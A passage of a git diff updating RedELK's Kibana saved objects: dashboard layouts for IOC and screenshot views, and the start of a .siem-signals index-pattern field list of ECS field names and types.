"b98cc0b8-ee93-4d34-b458-cd311eb995ea:panel_b98cc0b8-ee93-4d34-b458-cd311eb995ea", "type": "visualization"}, {"id": "3fabe620-6c38-11ea-97d6-55783aed877a", "name": "77f94499-3c4b-49c0-8379-62d38f4d7d8e:panel_77f94499-3c4b-49c0-8379-62d38f4d7d8e", "type": "search"}], "sort": [1645363347725, 1563], "type": "dashboard", "version": "1"} +{"attributes": {"description": "RedELK IOC dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":2,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"w\":48,\"x\":0,\"y\":0},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":11,\"i\":\"dfd53850-c595-4597-bbb5-ea03fc22e880\",\"w\":24,\"x\":0,\"y\":2},\"panelIndex\":\"dfd53850-c595-4597-bbb5-ea03fc22e880\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"IOC over time\",\"panelRefName\":\"panel_dfd53850-c595-4597-bbb5-ea03fc22e880\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":11,\"i\":\"f13deeb7-53dc-41af-9de0-486d7a171916\",\"w\":17,\"x\":31,\"y\":2},\"panelIndex\":\"f13deeb7-53dc-41af-9de0-486d7a171916\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"IOC Types\",\"panelRefName\":\"panel_f13deeb7-53dc-41af-9de0-486d7a171916\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":11,\"i\":\"133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70\",\"w\":7,\"x\":24,\"y\":2},\"panelIndex\":\"133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"h\":19,\"i\":\"d492599d-f662-450b-9982-54ab7db9f174\",\"w\":48,\"x\":0,\"y\":13},\"panelIndex\":\"d492599d-f662-450b-9982-54ab7db9f174\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_d492599d-f662-450b-9982-54ab7db9f174\"}]", "timeRestore": false, "title": "RedELK - IOC dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "86643e90-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "057076f0-d4e4-11ea-9301-a30a04251ae9", "name": "dfd53850-c595-4597-bbb5-ea03fc22e880:panel_dfd53850-c595-4597-bbb5-ea03fc22e880", "type": "visualization"}, {"id": "3729cde0-d4e4-11ea-9301-a30a04251ae9", "name": "f13deeb7-53dc-41af-9de0-486d7a171916:panel_f13deeb7-53dc-41af-9de0-486d7a171916", "type": "visualization"}, {"id": "5ffe8850-d4e4-11ea-9301-a30a04251ae9", "name": "133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70:panel_133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70", "type": "visualization"}, {"id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "name": "d492599d-f662-450b-9982-54ab7db9f174:panel_d492599d-f662-450b-9982-54ab7db9f174", "type": "search"}], "sort": [1645363347725, 1569], "type": "dashboard", "version": "1"} +{"attributes": {"description": "RedELK screenshots dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\"},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":11,\"i\":\"d4eb5dce-3894-4599-8c17-042fc067d58c\"},\"panelIndex\":\"d4eb5dce-3894-4599-8c17-042fc067d58c\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Screenshots over time\",\"panelRefName\":\"panel_d4eb5dce-3894-4599-8c17-042fc067d58c\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":13,\"w\":48,\"h\":19,\"i\":\"1db7741d-210a-4331-b1cb-affc6ac1334e\"},\"panelIndex\":\"1db7741d-210a-4331-b1cb-affc6ac1334e\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_1db7741d-210a-4331-b1cb-affc6ac1334e\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":7,\"h\":11,\"i\":\"3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0\"},\"panelIndex\":\"3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Total screenshots\",\"panelRefName\":\"panel_3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":31,\"y\":2,\"w\":17,\"h\":11,\"i\":\"66403011-8fb6-402f-b9b6-5f503d6df704\"},\"panelIndex\":\"66403011-8fb6-402f-b9b6-5f503d6df704\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Screenshots target users\",\"panelRefName\":\"panel_66403011-8fb6-402f-b9b6-5f503d6df704\"}]", "timeRestore": false, "title": "RedELK - Screenshots dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "a2dcebf0-d316-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "0b5ffcd0-d317-11ea-9301-a30a04251ae9", "name": "d4eb5dce-3894-4599-8c17-042fc067d58c:panel_d4eb5dce-3894-4599-8c17-042fc067d58c", "type": "visualization"}, {"id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "name": "1db7741d-210a-4331-b1cb-affc6ac1334e:panel_1db7741d-210a-4331-b1cb-affc6ac1334e", "type": "search"}, {"id": "389dddc0-d317-11ea-9301-a30a04251ae9", "name": "3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0:panel_3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0", "type": "visualization"}, {"id": "659280b0-d317-11ea-9301-a30a04251ae9", "name": "66403011-8fb6-402f-b9b6-5f503d6df704:panel_66403011-8fb6-402f-b9b6-5f503d6df704", "type": "visualization"}], "sort": [1645363347725, 1575], "type": "dashboard", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_.siem-signals.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_.siem-signals.ndjson index a4de64c5..df056117 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_.siem-signals.ndjson +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_.siem-signals.ndjson @@ -1 +1 @@ -{"attributes": {"fields": "[{\"count\":0,\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_score\",\"type\":\"number\",\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"agent.ephemeral_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"as.organization.name\"}}},{\"count\":0,\"name\":\"client.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"client.as.organization.name\"}}},{\"count\":0,\"name\":\"client.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.nat.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.nat.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"client.user.full_name\"}}},{\"count\":0,\"name\":\"client.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"client.user.name\"}}},{\"count\":0,\"name\":\"cloud.account.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.availability_zone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.instance.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.instance.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.machine.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.provider\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.region\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.image.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.image.tag\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.runtime\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"destination.as.organization.name\"}}},{\"count\":0,\"name\":\"destination.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.nat.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.nat.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"destination.user.full_name\"}}},{\"count\":0,\"name\":\"destination.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"destination.user.name\"}}},{\"count\":0,\"name\":\"dll.code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.company\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.file_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.original_file_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.class\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.data\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchab